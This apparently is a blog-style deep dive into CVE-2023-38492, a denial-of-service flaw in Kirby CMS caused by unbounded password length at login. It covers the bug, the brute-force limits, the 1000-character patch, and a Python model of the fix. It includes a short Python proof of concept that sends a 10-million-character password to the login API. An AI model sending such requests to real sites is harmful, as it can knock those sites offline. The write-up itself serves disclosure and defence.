Kirby is a popular flat-file content management system (CMS) known for its flexibility and simplicity. But even the best tools can have hidden security flaws. Recently, a vulnerability tracked as CVE-2023-38492 was discovered, affecting several versions of Kirby. In this deep dive, we'll break down what the bug is, why it matters, how it could be exploited, and what the Kirby team did to fix it. If you run a Kirby site, read on—using simple language, we'll help you understand the details and stay protected.

Fixed in: Kirby 3.9.6

If your site has user accounts (and you have not disabled Kirby's API and Panel), you’re affected.

The problem?
Kirby did not limit the length of the password submitted at login. Someone could send a password of thousands, hundreds of thousands or even millions of characters when attempting to log in, and Kirby would process it in full.

Why Is This a Problem?

Whenever you log in, Kirby hashes the password you entered and compares the result with the stored hash. Password hashing is deliberately expensive (it costs CPU time, and for some algorithms memory as well), and the longer the input, the more work the server does to receive, parse and hash it.

If an attacker sent an extremely long password, the server would spend a lot of time and resources processing it before it could even report a failed login. If such requests were repeated many times, your website could become unresponsive or go down entirely.

This kind of issue is called a Denial of Service (DoS) vulnerability.

The Kirby team rates the real-world impact as "limited", mainly because of Kirby's built-in brute-force protection:

- By default only 10 failed logins per IP address and 10 failed logins per existing user account are accepted within one hour (the auth.trials and auth.timeout options, 10 attempts and 3600 seconds respectively).

So an attacker cannot fire an unlimited number of login attempts from a single IP address.

But while mass exploitation is hard, a determined attacker could still use this flaw to slow down or (briefly) freeze your site, especially if you're running on a small or shared server.

Proof-of-Concept Exploit

Below is a simple proof-of-concept (PoC) in Python that shows how someone could abuse this issue. Note: this is for educational purposes only. Do not run it against servers you do not own or have explicit permission to test.

import time
import requests

URL = "https://your-kirby-site.com/api/auth/login"  # Replace with your real endpoint
USERNAME = "admin@example.com"  # Kirby logs in by e-mail address; replace with a valid one
HUGE_PASSWORD = "A" * 10_000_000  # 10 million characters, roughly a 10 MB request body

# Kirby's API login route expects a JSON body with "email" and "password"
data = {
    "email": USERNAME,
    "password": HUGE_PASSWORD,
}

start = time.monotonic()
response = requests.post(URL, json=data, timeout=120)  # allow for a slow response
elapsed = time.monotonic() - start

print("Status:", response.status_code)
print("Time taken: %.2f s" % elapsed)
print("Response:", response.text[:500])  # first 500 characters are enough to see the result

What this does:

- Builds a string of 10 million "A" characters and sends it as the password of an ordinary JSON login request to Kirby's API login endpoint, together with an account's e-mail address.
- Prints the HTTP status code and response body. On an unpatched site the server has to read the whole multi-megabyte body and hash the password before it can report the failed login, tying up CPU and memory for that time; on a patched site the password is rejected for its length before any hashing happens.
- Repeating such requests is what turns the delay into a denial of service, although the brute-force protection described above limits how many attempts any single IP address gets.

How Did Kirby Patch CVE-2023-38492?

The fix is simple but effective. Starting with the patched versions, Kirby rejects any password longer than 1000 characters, both when a password is set and when it is verified at login, before any hashing takes place.

Example patched PHP code (simplified; the stored-hash lookup is omitted and this is an illustration, not Kirby's actual method)

// Before patch: no length check, so an oversized $password goes straight into the hash function
public function login(string $email, string $password): bool
{
    // $storedHash is the password hash saved for $email (lookup omitted)
    // password_verify() re-runs the deliberately slow hash over the full input
    return password_verify($password, $storedHash);
}

// After patch: reject oversized passwords before any hashing happens
public function login(string $email, string $password): bool
{
    // strlen() counts bytes; a byte limit is at least as strict as a character limit
    if (strlen($password) > 1000) {
        throw new InvalidArgumentException('Password is too long.');
    }
    return password_verify($password, $storedHash);
}

If someone tries to log in with an oversized password, the server rejects it immediately, without spending any CPU time on hashing.
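To make the two mechanisms above concrete, here is an added, self-contained Python model of a login service that applies Kirby-style brute-force tracking (10 failed attempts per IP address and per existing user within one hour) and the patched length cap (reject anything over 1000 bytes before hashing). It is example code written for this article, not Kirby's code: hashlib.pbkdf2_hmac stands in for the CMS's password hash, the account, IP addresses and timestamps are constructed for the demo, and the order in which the checks run is an assumption.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict
from typing import Dict, List, Optional

# Limits taken from the text above (assumed to model Kirby's defaults, not its code)
MAX_PASSWORD_BYTES = 1000   # cap enforced before hashing (patched behaviour)
MAX_TRIALS = 10             # failed attempts tolerated per IP and per user ...
WINDOW_SECONDS = 3600       # ... within this many seconds

# PBKDF2 stands in for the CMS's password hash; modest cost keeps the demo fast
PBKDF2_ITERATIONS = 50_000


def hash_password(password: str, salt: Optional[bytes] = None) -> bytes:
    """Return salt || PBKDF2-HMAC-SHA256(password) for storage."""
    salt = salt or os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


def verify_password(password: str, stored: bytes) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return hmac.compare_digest(candidate, digest)


class LoginService:
    def __init__(self, users: Dict[str, bytes], enforce_length_cap: bool = True):
        self.users = users                        # email -> stored hash
        self.enforce_length_cap = enforce_length_cap
        self.failures: Dict[str, List[float]] = defaultdict(list)  # counter key -> timestamps
        self.hash_calls = 0                       # how often the expensive step ran

    def _recent_failures(self, key: str, now: float) -> int:
        self.failures[key] = [t for t in self.failures[key] if now - t < WINDOW_SECONDS]
        return len(self.failures[key])

    def _is_blocked(self, ip: str, email: str, now: float) -> bool:
        if self._recent_failures("ip:" + ip, now) >= MAX_TRIALS:
            return True
        # the per-user counter only exists for accounts that actually exist
        return email in self.users and self._recent_failures("user:" + email, now) >= MAX_TRIALS

    def _track_failure(self, ip: str, email: str, now: float) -> None:
        self.failures["ip:" + ip].append(now)
        if email in self.users:
            self.failures["user:" + email].append(now)

    def login(self, ip: str, email: str, password: str, now: Optional[float] = None) -> str:
        """Return 'ok', 'blocked', 'too_long' or 'invalid'."""
        now = time.time() if now is None else now
        if self._is_blocked(ip, email, now):
            return "blocked"                      # cheap rejection, nothing is hashed
        if self.enforce_length_cap and len(password.encode()) > MAX_PASSWORD_BYTES:
            self._track_failure(ip, email, now)
            return "too_long"                     # patched path: reject before hashing
        stored = self.users.get(email)
        if stored is not None:
            self.hash_calls += 1                  # the expensive step
            if verify_password(password, stored):
                return "ok"
        self._track_failure(ip, email, now)
        return "invalid"


def demo() -> Dict[str, object]:
    """Constructed scenario: one account, attacker IPs and timestamps made up for the demo."""
    good = "correct horse battery staple"
    users = {"admin@example.com": hash_password(good)}
    huge = "A" * 10_000_000                       # the PoC's 10-million-character password
    r: Dict[str, object] = {}

    vulnerable = LoginService(dict(users), enforce_length_cap=False)
    vulnerable.login("203.0.113.7", "admin@example.com", huge, now=0.0)
    r["vulnerable_hashed_huge"] = vulnerable.hash_calls       # 1: hashed all 10 MB

    patched = LoginService(dict(users), enforce_length_cap=True)
    r["patched_huge"] = patched.login("203.0.113.7", "admin@example.com", huge, now=0.0)
    r["patched_hash_calls"] = patched.hash_calls              # 0: rejected before hashing
    r["patched_good"] = patched.login("203.0.113.7", "admin@example.com", good, now=1.0)

    # brute-force protection: ten failures from one IP exhaust both the IP and the user counter
    for i in range(MAX_TRIALS):
        patched.login("198.51.100.9", "admin@example.com", "wrong-%d" % i, now=float(i))
    r["blocked_same_ip"] = patched.login("198.51.100.9", "admin@example.com", good, now=20.0)
    r["user_locked_other_ip"] = patched.login("192.0.2.1", "admin@example.com", good, now=21.0)
    # the block expires once the failures fall out of the one-hour window
    r["after_window"] = patched.login("198.51.100.9", "admin@example.com", good, now=4000.0)
    return r


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Run it directly to print the outcomes. The hash_calls counter is the point: the unpatched service hashes the 10 MB password, the patched one never reaches the hash function for it, and once an IP address or an account has used up its 10 tries within the window, further attempts (even with the correct password) are refused without hashing either, until the window passes.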

How to Fix (and Protect Yourself)

1. Update immediately if you haven't: install Kirby 3.9.6 (or a later release). See the official release notes for details.

More References

- Kirby Security Advisory
- NIST NVD Entry for CVE-2023-38492
- Kirby Release Notes

Final Thoughts

CVE-2023-38492 may not be the scariest vulnerability out there, but it is an important reminder: even small oversights like a missing input length limit can have real effects. The Kirby team acted quickly, so site owners can rest easier.

If you’re running Kirby, update now. And always remember—good security is a habit, not just a patch.

Timeline

Published on: 07/27/2023 16:15:00 UTC
Last modified on: 08/03/2023 13:35:00 UTC